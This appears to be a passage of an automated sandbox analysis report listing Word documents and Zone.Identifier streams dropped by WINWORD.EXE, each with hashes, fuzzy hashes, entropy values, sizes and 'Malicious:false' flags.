                            SHA-256:0DBB0A88B1B3F9341D84C7ED258FBB8C476E8EC0A3C6F5C0099F7325AA227F5C
                            SHA-512:EF8C3DEA1BC73E21B6606DBA590D59E331D0F73B1D28C4A98632DB73512B4A91B48454561BC44AEF96FE4A22AEBCE3539D3008705E29EFE16A5B220AC260A992
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115506
                            Entropy (8bit):7.944726540417103
                            Encrypted:false
                            SSDEEP:3072:JIbjWGDyeMEe0HilfUmRit5PY+zmp+ITb02i8BkJke2T:S/bolfUmeS+6pxgmaPE
                            MD5:303DAE80853BA3BFFD2EC3F41EEA0070
                            SHA1:E068F9529BD0CFA16BC5F11DB707836157A8BDBB
                            SHA-256:68A56B542EB57A1673D4FE1D95E235AC9199B0C1E977D55AF8F625D000404EAB
                            SHA-512:2FEAA996F9161E2221024C28753BDEDAC986AFDA3704F69D6F577B02467E2B696B262CC6D6C5A4DD5C1B90DF4CEF42AFA03F8F1229BF54EFE2085966D1ED880F
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115509
                            Entropy (8bit):7.9450342480953235
                            Encrypted:false
                            SSDEEP:3072:JIbz25vRCAeMEe0H+O0VDcam+ucIL9SILFwivHyPCBYKu2Z:SzVFQO0VoabLI0yFBHyPC6K7Z
                            MD5:7B7FD53F701D6C74CC2567FB0C58E7D5
                            SHA1:1CD32268EEB2271E40BF5BD2DE3FDA211CD157DB
                            SHA-256:8FDF5A8887E6C3E670F203976F46912CD555FD789EBB477291282A48A147AA52
                            SHA-512:ED865A7745D02F61C3DFCC0F8B7647D98C03CBF66B7D49D7DA70A8AED002B17A192953CACA36B46FE24DDA321F3E8B0F39083760CC674BF81B439B8A8F4A6479
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115791
                            Entropy (8bit):7.944658381563658
                            Encrypted:false
                            SSDEEP:3072:JIbOoYBqbJUYqpYwr5NLvy5qQN1mg+IT24FBDiZ2u:SOCJUPpYKzby8/gx24FVRu
                            MD5:A6FD24F4904D25F75303CEDB91C1E371
                            SHA1:D032A9F45365E08C07068CA161C2483B69CB5C6E
                            SHA-256:BEC68B3B89984AB98B498543B6CE8A68906F1E4A05261C307123C5F33F4AB4DA
                            SHA-512:657242D587882944B7990921D7E8C98818E2D13C5BA94C57A2F4C1EFE17751EB70F8835FCC7DC2EF38C30B4FC74E1A31B6A0D7FF8B05891D0C263F446058ED40
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198339
                            Entropy (8bit):7.95821054799877
                            Encrypted:false
                            SSDEEP:6144:SAN7kUjmJrMSzFK1d4lbz8iTVyJl2WK4U8cT:SEkVtjmd4B8ijWZcT
                            MD5:BA060F0047D1A2A7D7C45B9473014E6B
                            SHA1:8B3105479DD7A31A61ED38C27B7636CD3BCD7221
                            SHA-256:30F7A984A272C0B99D427715ACC76C0B9E9CBEE76F5435D4C35B2543CBF5704C
                            SHA-512:CA0BB3C213000F473E457E46A7030EED6889784624334EA3768F7F33CCC422B22970B6C18C1C6BB5F010A06A107C686D32962568142C9E95499FEF21B4848326
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198326
                            Entropy (8bit):7.95767281316488
                            Encrypted:false
                            SSDEEP:6144:S1zU9DM7k/ImJZEQkpHkBvveqvgbx/uYL:SaOk/PsQkpeXenbRuYL
                            MD5:4DEDD6539BBF62051EA44275D84043CF
                            SHA1:D2943448503284056AA33778CE0AF737D0CA4D46
                            SHA-256:43BF3EB421F129E31F67C47A29439038FDD4FF0C792EB557645DB144D6C64268
                            SHA-512:F617BB50F294BF108E120AA6646EB2D1E5D1F85FB20F895FD71C42888DA30CD5F7158D49875D7BBC2819012D41835202676C65790C1EF41EC927A0FBFAFD6630
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198555
                            Entropy (8bit):7.958174314216648
                            Encrypted:false
                            SSDEEP:6144:SHdiwewcLsEmJ2kKOYlZrtibkl2YTmU+MU:SHZLpKTZ50XvU+MU
                            MD5:1264751C73F6713474937400BAAC82C2
                            SHA1:A8894582F99E00087F639925087F278D59827669
                            SHA-256:758319FF61A07D4E20DC56B54D554DB13B28BDAFD03AFA79958B44BE881DFBBF
                            SHA-512:AA13B6F1EDF85F31D743974D1A389709CDCEAE6595784B3505EAB2CBD6D7BEFF7347F5330583808ECA38FB02289E51BD337873DF08E530F0B06C15BF40A6A8B7
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198328
                            Entropy (8bit):7.958359439364144
                            Encrypted:false
                            SSDEEP:6144:SlgXewcLsryaSsUDK1549QVs0Bv7lOA4K/2Z0y:SlQrylsUDm54J0Bv5OzZ0y
                            MD5:3F1D2CD8A97634F249A5FDC941621E2E
                            SHA1:02A7C89A3E646ED2A87A5AEC0634D6C196F9A2C4
                            SHA-256:BA4107231F1ABD0E60CE1403EDC8D37D8F0F7C0D9D5ABA979505FFE9C3D8FF5E
                            SHA-512:601D33446457503DC5891607EFAE808F3F18307E64E780C5AC3BA8126FAA14FB7B4BFC3ADE66218F018C65431209E7308CC11011009293997F0BB5B2818036F0
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115515
                            Entropy (8bit):7.9456034172755095
                            Encrypted:false
                            SSDEEP:3072:JIbvomDyq/Xfp8LW9qbNsHu1p7ZeyTdB7S1Kg:Sw0yOXfpoW43/Ngp
                            MD5:D0305F2A9F31D4AD5490425BDB7E99A1
                            SHA1:0FDA0A966D9FA84FB888FC05F8634161AB10CDC6
                            SHA-256:DA29444E3193C27A5E53F0510E9092AF52B38C219139E5FE7DAD5B8F71B3692F
                            SHA-512:11D4E8E452C57F58BE1845F31626648EA1E90AE31B5909C2937C72BB4A31C19EF40329338217933DE546C6F6D7C1CBA0B4546856B010B0794FB5AB4153862A3C
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198540
                            Entropy (8bit):7.958290171066933
                            Encrypted:false
                            SSDEEP:3072:JIbHDd4HKeC3jEFWcfkVX1Hfm4aW1gJqtlSav7rpTv6TJu3Ac2Ys/NABZ1Kg:SHDd4qNj+LcVJuM4K/7lvmO2x/KXh
                            MD5:55505D8FC592715D752AE3EEEBE5E740
                            SHA1:48F516C6820336EEFC915F6321B38D758813399E
                            SHA-256:1A7F8A1F9B1B2C43446DE82D918FDDFE4614721CFA9EB7929FCD1BEB18FC38D3
                            SHA-512:79CCB5F8AB43B3E5AA9131C5E6A664D68FD1AC2A8FED94363D1C2F1FC6C4B029D374DC44C2001778EF4DA038CABCBF983F1A0181A56768C8A4B0C303DE73F474
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115508
                            Entropy (8bit):7.945393451555634
                            Encrypted:false
                            SSDEEP:3072:JIbLECJfYBSeMEe0HTfpot5lW45mAP51UjC4BXXBBA1h2m:SonFfp2rW45mAP5TSHbAqm
                            MD5:9AA15DBE05CFB2B1D1C92E03B1B0E3DD
                            SHA1:7F490514503A6EF4593A40DC2C33F9A05BE36B4A
                            SHA-256:D772658345F64836102639A14303ECE1160F7453667468A78FF57B89D3B9DCF3
                            SHA-512:3559C491E19D11042CE9A5BAD670987F22B4B1BF879413C3D929ABBA30B4EDB4E8F6D9C053789B334BDCD39CFB51D96A063CD2C6FD3589D57A4E1814F9542261
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115504
                            Entropy (8bit):7.944499324034596
                            Encrypted:false
                            SSDEEP:3072:JIb5716bt75DGkDFUy8OL0WGDWu+q1XBQ92I:S571EtlDGkDL0WGDjXKgI
                            MD5:109615FF10E3372B70D9AB393CFBFDC7
                            SHA1:1376767616D45863A21CD0ADA6B8A4607E47ED0F
                            SHA-256:75F8E3EEF99B91441930A96218F2A163FDC60BD3DBDE463312A5630DEC47F8D0
                            SHA-512:4A67877839BBA18357BC4E2CB0ADD8BAECD01596BC0B3A0F0E03B556F67FC05C37C0437A1066412478ADEDB6B8B4AED69083B06F3DDEFCB9973A1C343BFEEC27
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198938
                            Entropy (8bit):7.958374536385948
                            Encrypted:false
                            SSDEEP:6144:S7VN7kUjmJrMSzFK1d4lbz8iTVyJl2WK4IeQD:SDkVtjmd4B8ijWweQD
                            MD5:7CCCD9E322FE9C4BBE4A1C16444447D4
                            SHA1:DB1CEDDA422CE05AB4559EC23E66A94AF08EC50D
                            SHA-256:8B88E07143C838304AB119A82332F96B702A73F526FC5446EE8975463B628207
                            SHA-512:DEA97DC00E348F8AA1649A0E69A3FD757BB659944CBA0CB040F636680A97E033652CE5CCB12C780E3FF35FD3DC5A8A58CA4A613C183A5BE161B6E62788E73E38
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115638
                            Entropy (8bit):7.944830121189172
                            Encrypted:false
                            SSDEEP:3072:JIbRYBqbJUYqpYwr5NLvy5qQN1mg+ITF4F5lO/BW1Ya:SVJUPpYKzby8/gxF4c4t
                            MD5:EA377511B3764DFCABC08A741F8D6B25
                            SHA1:617B2F4670E62CC9FD387065AA14FFE4A13C346F
                            SHA-256:AC28850A3C1C26F4C3DBD4A15F4EC86A60BD591467C0EDAF8A6E3B1CF6601C60
                            SHA-512:1CAD4A210DCE198AFF365C0331F0D807CCF1A5A902805ABD1D0726AA88F01F75BDAFE52880B7045A6CCE83B148F1A4070F3640E18C3434D8F9730D8C3A4039C8
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198329
                            Entropy (8bit):7.957981976091146
                            Encrypted:false
